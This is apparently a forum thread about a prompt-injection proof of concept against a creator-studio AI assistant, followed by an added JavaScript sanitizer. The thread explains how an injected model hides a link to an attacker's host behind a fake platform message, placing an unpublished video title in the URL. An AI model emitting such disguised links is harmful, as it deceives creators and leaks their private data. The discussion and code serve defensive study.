The described "attack" would not work, due to not triggering an HTTP request.
When an LLM generates text, it does not send requests to URL-looking strings it generates to validate they are real/live.
You'd never get your "ping" request.
The author is aware of that; the PoC requires interaction from the creator using the studio AI:
> When the creator clicked the link, I received a request with the video title in the URL parameter.
The LLM responds with rendered markdown, which conceals the actual link. It constructs it in such a way that the link looks like a message or warning from the YouTube platform, or perhaps something like
> Message response too large, click [here](malicious-host.net/blabla?video="Secret Unpublished Video") to download
This is an environment where I suspect a majority of creators probably expect that untrusted links like this are possible, and assume anything the platform spits out is legitimate. So you are right that it relies on the creator clicking the link, but that is a very real possibility here.
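
Added example, not part of the thread and not code from the platform discussed: one way a chat front end could defuse the concealed-link lure described above is to rewrite model output before rendering, so that any markdown link to a host outside an allowlist becomes inert text showing its real destination. The allowlist, the `exfil.example` host and the function names are assumptions, and a production renderer would apply the same rule to the parsed markdown tree rather than a regex.

```javascript
// Added example: hosts the assistant UI may render as clickable links.
// Assumption: illustrative allowlist, not taken from any real product.
const ALLOWED_HOSTS = new Set(["www.youtube.com", "support.google.com"]);

// Inline markdown link: [label](target "optional title")
const MD_LINK = /\[([^\]]*)\]\(\s*<?([^)\s>]+)>?[^)]*\)/g;

function parseTarget(target) {
  // Scheme-less targets ("host.example/path") are parsed as https, the
  // worst case for a renderer that auto-completes them.
  const hasScheme = /^[a-z][a-z0-9+.-]*:/i.test(target);
  try {
    return new URL(hasScheme ? target : "https://" + target.replace(/^\/\//, ""));
  } catch {
    return null;
  }
}

function rewrite(markdown, blocked) {
  return markdown.replace(MD_LINK, (whole, label, target) => {
    if (/^(\/(?!\/)|#)/.test(target)) return whole; // same-origin path or fragment
    const url = parseTarget(target);
    if (url && url.protocol === "https:" && ALLOWED_HOSTS.has(url.hostname)) return whole;
    blocked.push(target);
    const host = url && url.hostname ? url.hostname : "unparseable target";
    // Keep the label, drop the link, and show where it pointed as inert code text.
    return label + " (link removed: `" + host + "`)";
  });
}

function neutralizeLinks(markdown) {
  const blocked = [];
  let prev, safe = markdown;
  // Repeat until stable so nested brackets cannot reassemble into a new link.
  do { prev = safe; safe = rewrite(prev, blocked); } while (safe !== prev);
  return { safe, blocked };
}

// Constructed sample modelled on the lure quoted above.
const SAMPLE = "Message response too large, click " +
  "[here](https://exfil.example/dl?video=Secret%20Unpublished%20Video) to download. " +
  "See [Help](https://support.google.com/youtube).";
console.log(neutralizeLinks(SAMPLE));
```

The `blocked` array is worth logging server-side: a model response that tries to link to an unlisted host with conversation data in the query string is a useful detection signal for injected instructions.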